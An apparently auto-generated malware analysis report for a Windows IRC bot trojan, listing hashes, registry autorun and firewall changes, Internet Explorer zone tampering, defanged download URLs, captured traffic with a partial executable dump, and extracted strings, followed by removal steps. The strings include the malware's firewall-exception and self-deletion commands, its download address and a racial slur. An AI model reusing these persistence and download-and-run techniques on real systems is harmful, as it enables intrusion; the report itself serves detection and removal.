Trojan.GenericKD.2501700_eac01b3e3d

by malwarelabrobot on July 10th, 2015 in Malware Descriptions.

Trojan.Win32.IRCbot.wbc (Kaspersky), Trojan.GenericKD.2501700 (B) (Emsisoft), Trojan.GenericKD.2501700 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: eac01b3e3da68a9d6f8a4d5bdba8ff80
SHA1: 4b4e72c1312ed93dbcf5941d38599950afeef16c
SHA256: 2bc8da93aef5da7a450c44db33f36091d7e17d13401a79b40058577acb837f43
SSDeep: 12288:TdomNG5aNscVYomwSGgBJMn4Qp8MIU7TmF8/FNEz1l4RBzDYaLLfXTBxEK xeoM:T9NhNsqYoGGGMJXIVF8DDffXlxEfxO
Size: 875520 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, BorlandDelphi30, BorlandDelphiv30, ACProtect141
Company: no certificate found
Created at: 2014-01-12 03:27:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

derp_01240.exe:1676
derp_01240.exe:1540
netsh.exe:1692
acrobatreader.exe:2016
%original file name%.exe:464
%original file name%.exe:1752

The Trojan injects its code into the following process(es):

acrobatreader.exe:500
svchost.exe:1716

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process acrobatreader.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\derp_01240.exe (81692 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\max[1].exe (81284 bytes)

The process %original file name%.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\acrobatreader.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)

Registry activity

The process derp_01240.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 76 F5 FD 8B B6 57 E2 51 0A E8 B2 81 71 BA 5B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost.exe" = "%Documents and Settings%\%current user%\Application Data\svchost.exe"

The process derp_01240.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE EF A9 F6 68 FA 45 2C 4D 3D 9A 20 FC DD FC 5F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process netsh.exe:1692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 54 92 24 47 1B 0F 3E FE 82 FC 60 88 46 78 8D"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data]
"acrobatreader.exe" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe:*:Enabled:Adobe Reader Update"

The process acrobatreader.exe:2016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 0B 99 36 B8 6D D5 5E 79 3F B6 1E 00 16 B1 27"

The process acrobatreader.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF E0 A6 26 6C E8 55 49 DF BE 12 90 85 3F B2 D2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 0E 06 90 DD FF B0 18 B3 24 77 7A 3C 7C 5A 5B"

The process %original file name%.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 8E CB A0 29 F2 F6 E9 61 FA F3 0F B4 EC E4 3C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Update" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Update" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe"

Dropped PE files

MD5 File path
9a5e80109ac5da734e5b8aa29d9ed8df c:\Documents and Settings\"%CurrentUserName%"\Application Data\svchost.exe
9a5e80109ac5da734e5b8aa29d9ed8df c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\max[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 562940 563200 4.52767 068d9a376436b015dbd4fdb972e80d7c
DATA 569344 30448 30720 5.21875 98d49094de9f7a9dbb31c618f776473f
BSS 602112 3317 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 606208 9476 9728 3.3778 a65f858bde8d7f88687651b7b6fcdf07
.tls 618496 16 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 622592 24 512 0.135303 f2cbff1572620ca433944bdc7cea224b
.reloc 626688 41336 41472 4.58274 81c2ada2bffa4a11c3ecdc6ccc64e3e3
.rsrc 671744 228408 228864 4.31735 46e5267f125ef15b5927ed9b90603d08

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://galaxee.eu/max.exe
hxxp://www.galaxee.eu/max.exe 85.214.98.170
max.wifi-usbw.me 82.165.129.253


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /max.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: VVV.galaxee.eu


HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 02:33:40 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Wed, 08 Jul 2015 18:30:25 GMT
ETag: "14882de-13e00-5512d240"
Accept-Ranges: bytes
Content-Length: 81408
Content-Type: application/x-ms-dos-executable
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....j.U
.................4...........R... ...`....@.. ........................
[email protected]....`..............
................................................................. ....
........... ..H............text....3... ...4.................. ..`.rsr
c........`.......6..............@[email protected]...............<.........
[email protected]...............!...'.......
....................................0..........r...p(....s....r...po..
..(...........(....r...p..........(....(....(.........(.....r...p.....
...............(.....r ..p...........rE..p.... .......................
........(....&.!u....%-.&. .%.(..........&(......*....................
0..T...............................................(...........(......
.(.......X...X.. ....1..*................lSystem.Resources.ResourceRea
der, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c
561934e089#System.Resources.RuntimeResourceSet............PADPADPn~.[.
........b.K.x.n.D.P..... ....AZ......................L................
...............................-..L.!This p~ogram cannox be run in HOS
 mode....([email protected]...........!................b4... ...@...
.@.. ....................................@............................
......4..W....@.......................`...............................
........................ ............... ..H............text...x..
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

acrobatreader.exe_500:

.text
`.rdata
@.data
.rsrc
@.reloc
t1SSSSh
p1icka.stp
%sgoogle_%d%d%d%d%d.exe
%s therad dis.
%s dlin from: %s to: %s.
%sderp_%d%d%d%d%d.exe
%s cant parse.
:Zone.Identifier
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
user32.dll
%s %s * 0 :%s
%s %s
%s %s :%s
%s %s %s
%s %s %s %s
wuzsd.tmp~
del "%s">nul
if exist "%s" goto rep
attrib -s -h -r wuzsd.tmp~&del /A /Q wuzsd.tmp~
ping 0.0.0.0
%s\rmme%i%i%i%i.bat
Software\Microsoft\Windows\CurrentVersion\Run\
Ping Timeout? (%d-%d)%d/%d
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
shlwapi.dll
ShellExecuteA
shell32.dll
mpr.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
netsh firewall add allowedprogram "%s" "%s" ENABLE
%s dns err bad url <%d>
%s failed upd: error exec f: %s.
%s proc done: "%s", tot run time: %s.
%s created proc: "%s", PID: <%d>
%s faild to create: "%s", error: <%d>
%s cant parse path, err: <%d>
%s f dld: %.1fKB to: %s @ %.1fKB/s.
A%s cant open file f writing: %s.
%s!%s@%s
PRIVMSG
%s no %s th d.
%s %s thread stop. (%d thread(s) stopped.)
operator
GetProcessWindowStation
USER32.dll
OLEAUT32.dll
GetWindowsDirectoryA
GetCPInfo
GetProcessHeap
KERNEL32.dll
RegCloseKey
RegCreateKeyExA
ADVAPI32.dll
%s sup?.
%s wtf?
%s %s runnin already!: <%d>
%s faaaiiiiil %s, xDDDDDD: <%d>
no kick me nigga %s
%s logd in.
remove: rem by: %s!%s@%s.
%s advapidll fail.
%s pstoredll fail.
%s main tread.
%s missing a param yo.
msn, msg sent to %s contacts!.
aim, msg sent to %s contacts!.
zcÁ
192.168.11.129
l: dlin from: hXXp://VVV.galaxee.eu/max.exe to: C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\derp_01240.exe.
%Documents and Settings%\%current user%\Application Data\acrobatreader.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
@KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL

acrobatreader.exe_500_rwx_00400000_00062000:

.text
`.rdata
@.data
.rsrc
@.reloc
t1SSSSh
p1icka.stp
%sgoogle_%d%d%d%d%d.exe
%s therad dis.
%s dlin from: %s to: %s.
%sderp_%d%d%d%d%d.exe
%s cant parse.
:Zone.Identifier
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
user32.dll
%s %s * 0 :%s
%s %s
%s %s :%s
%s %s %s
%s %s %s %s
wuzsd.tmp~
del "%s">nul
if exist "%s" goto rep
attrib -s -h -r wuzsd.tmp~&del /A /Q wuzsd.tmp~
ping 0.0.0.0
%s\rmme%i%i%i%i.bat
Software\Microsoft\Windows\CurrentVersion\Run\
Ping Timeout? (%d-%d)%d/%d
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
shlwapi.dll
ShellExecuteA
shell32.dll
mpr.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
netsh firewall add allowedprogram "%s" "%s" ENABLE
%s dns err bad url <%d>
%s failed upd: error exec f: %s.
%s proc done: "%s", tot run time: %s.
%s created proc: "%s", PID: <%d>
%s faild to create: "%s", error: <%d>
%s cant parse path, err: <%d>
%s f dld: %.1fKB to: %s @ %.1fKB/s.
A%s cant open file f writing: %s.
%s!%s@%s
PRIVMSG
%s no %s th d.
%s %s thread stop. (%d thread(s) stopped.)
operator
GetProcessWindowStation
USER32.dll
OLEAUT32.dll
GetWindowsDirectoryA
GetCPInfo
GetProcessHeap
KERNEL32.dll
RegCloseKey
RegCreateKeyExA
ADVAPI32.dll
%s sup?.
%s wtf?
%s %s runnin already!: <%d>
%s faaaiiiiil %s, xDDDDDD: <%d>
no kick me nigga %s
%s logd in.
remove: rem by: %s!%s@%s.
%s advapidll fail.
%s pstoredll fail.
%s main tread.
%s missing a param yo.
msn, msg sent to %s contacts!.
aim, msg sent to %s contacts!.
zcÁ
192.168.11.129
l: dlin from: hXXp://VVV.galaxee.eu/max.exe to: C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\derp_01240.exe.
%Documents and Settings%\%current user%\Application Data\acrobatreader.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
@KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL

svchost.exe_1716:

.text
`.rdata
@.data
.rsrc
@.reloc
.PQRSU
t=SSSh
t"SSh
SSShM
PSSh%
PSSSSSSh
SSSht&@
PSShX`A
4<%u,F
%s %s
JOIN %s %s
%s %s %s
%s %s %d %d :%s
JOIN
^0P#R!T"V;H.JML
H-K/k)F E%U'S!"#
Messaged %d users, Skype version %S
%s %s :{%s}: %s
%sX
%s #%s
MSVCRT.dll
ntdll.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeW
KERNEL32.dll
WS2_32.dll
SHLWAPI.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
ole32.dll
PSAPI.DLL
ShellExecuteW
SHELL32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
ADVAPI32.dll
OLEAUT32.dll
USER32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2 2%2*202
8"8.83898
\\.\pipe\%s-%d
\\.\pipe\%s
%s\%s.exe
Mozilla/5.0 (Compatible)
/c ping 0 & del "%s" > NUL
%s\cmd.exe
???? ???,
???? ???
.jpeg
UDPStatsSentVersion
%d%d%d
%d%d%d%d
%d%d%d%d%d
%d%d%d%d%d%d
\nspC06D.tmp
%s-%d
dnsapi.dll
advapi32.dll
comsupp.dll
shell32.dll
wininet.dll
shlwapi.dll
user32.dll
ws2_32.dll
psapi.dll
Ole32.dll
kernel32.dll
%s.exe
%s\%s
%s\*.exe
Software\Microsoft\Windows\CurrentVersion\Run
%s\explorer.exe
%Documents and Settings%\%current user%\Application Data\svchost.exe
svchost.exe
hXXps://goo.gl/GI1HBO?mx

svchost.exe_1716_rwx_00400000_0002B000:

.text
`.rdata
@.data
.rsrc
@.reloc
.PQRSU
t=SSSh
t"SSh
SSShM
PSSh%
PSSSSSSh
SSSht&@
PSShX`A
4<%u,F
%s %s
JOIN %s %s
%s %s %s
%s %s %d %d :%s
JOIN
^0P#R!T"V;H.JML
H-K/k)F E%U'S!"#
Messaged %d users, Skype version %S
%s %s :{%s}: %s
%sX
%s #%s
MSVCRT.dll
ntdll.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeW
KERNEL32.dll
WS2_32.dll
SHLWAPI.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
ole32.dll
PSAPI.DLL
ShellExecuteW
SHELL32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
ADVAPI32.dll
OLEAUT32.dll
USER32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2 2%2*202
8"8.83898
\\.\pipe\%s-%d
\\.\pipe\%s
%s\%s.exe
Mozilla/5.0 (Compatible)
/c ping 0 & del "%s" > NUL
%s\cmd.exe
???? ???,
???? ???
.jpeg
UDPStatsSentVersion
%d%d%d
%d%d%d%d
%d%d%d%d%d
%d%d%d%d%d%d
\nspC06D.tmp
%s-%d
dnsapi.dll
advapi32.dll
comsupp.dll
shell32.dll
wininet.dll
shlwapi.dll
user32.dll
ws2_32.dll
psapi.dll
Ole32.dll
kernel32.dll
%s.exe
%s\%s
%s\*.exe
Software\Microsoft\Windows\CurrentVersion\Run
%s\explorer.exe
%Documents and Settings%\%current user%\Application Data\svchost.exe
svchost.exe
hXXps://goo.gl/GI1HBO?mx


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    derp_01240.exe:1676
    derp_01240.exe:1540
    netsh.exe:1692
    acrobatreader.exe:2016
    %original file name%.exe:464
    %original file name%.exe:1752

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\derp_01240.exe (81692 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\max[1].exe (81284 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\acrobatreader.exe (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "svchost.exe" = "%Documents and Settings%\%current user%\Application Data\svchost.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Adobe Reader Update" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe"

